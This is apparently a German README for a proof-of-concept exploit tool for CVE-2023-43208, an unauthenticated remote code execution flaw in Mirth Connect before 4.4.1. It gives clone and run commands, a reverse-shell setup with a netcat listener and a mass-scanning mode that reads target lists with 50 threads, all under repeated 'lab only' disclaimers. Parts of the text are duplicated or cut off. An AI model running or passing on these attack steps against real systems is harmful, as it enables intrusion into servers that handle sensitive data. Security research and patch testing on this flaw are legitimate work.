
Ein Proof-of-Concept-Exploit für CVE-2023-43208, eine Sicherheitslücke zur Remote-Code-Ausführung in Mirth Connect vor Version 4.4.1.
⚠️ NUR FÜR BILDUNGSZWECKE UND LABORNUTZUNG ⚠️
Ein Proof-of-Concept-Exploit für CVE-2023-43208, eine Remotecodeausführung-Sicherheitslücke in Mirth Connect vor Version 4.4.1.
Dieses Tool ist ausschließlich bestimmt für:
NICHT VERWENDEN:
Du bist dafür verantwortlich, alle geltenden Gesetze und Vorschriften einzuhalten. Missbrauch dieses Tools kann zu strafrechtlichen Konsequenzen führen.
Dieser Exploit zielt auf die XML-Deserialisierungssicherheitslücke im /api/users-Endpunkt von Mirth Connect ab, die eine nicht authentifizierte Remotecodeausführung auf betroffenen Versionen (< 4.4.1) ermöglicht.
Dies ist eine KRITISCHE Sicherheitslücke und sollte NUR in isolierten Laborumgebungen mit eigenen Systemen getestet werden.
requirements.txt aufgeführt sind# Clone the repository
git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git
cd CVE-2023-43208-EXPLOIT
# Install requirements
pip install -r requirements.txt
python exploit.py
# Einzelziel-Ausnutzung (NUR FÜR LABORZUWECK)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
# Mehrere Ziele aus Datei scannen (NUR FÜR LABORZUWECK)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
# Nicht-interaktiver Modus (NUR FÜR LABORZUWECK)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
-u, --url Ziel-URL zum Ausnutzen (NUR FÜR LABORZUWECK)
-lh, --lhost Lauschhost (deine IP)
-lp, --lport Lauschport
-f, --file Datei mit Ziel-URLs zum Scannen
-o, --output Ausgabedatei zum Speichern der Scanergebnisse
-t, --threads Anzahl der Threads zum Scannen (Standard: 50)
--no-interactive Im nicht-interaktiven Modus ausführen
Richte dein Labor ein:
Starte deinen Listener:
ncat -lnvp 4444
# oder
nc -lnvp 4444
Führe den Exploit in deinem Labor aus:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
Der Exploit verwendet Commons-Collections-Gadgets, um RCE über den /api/users-Endpunkt zu erreichen.
Wenn du Mirth Connect betreibst:
╔══════════════════════════════════════════════════════════════╗ ║ DIESES TOOL IST NUR FÜR LABORZUWECK ║ ║ Unautorisierte Nutzung ist ILLEGAL und UNETHISCH ║ ║ Du übernimmst das GESAMTE Risiko und die Haftung ║ ║ Der Autor übernimmt KEINE Verantwortung für Missbrauch ║ ╚══════════════════════════════════════════════════════════════╝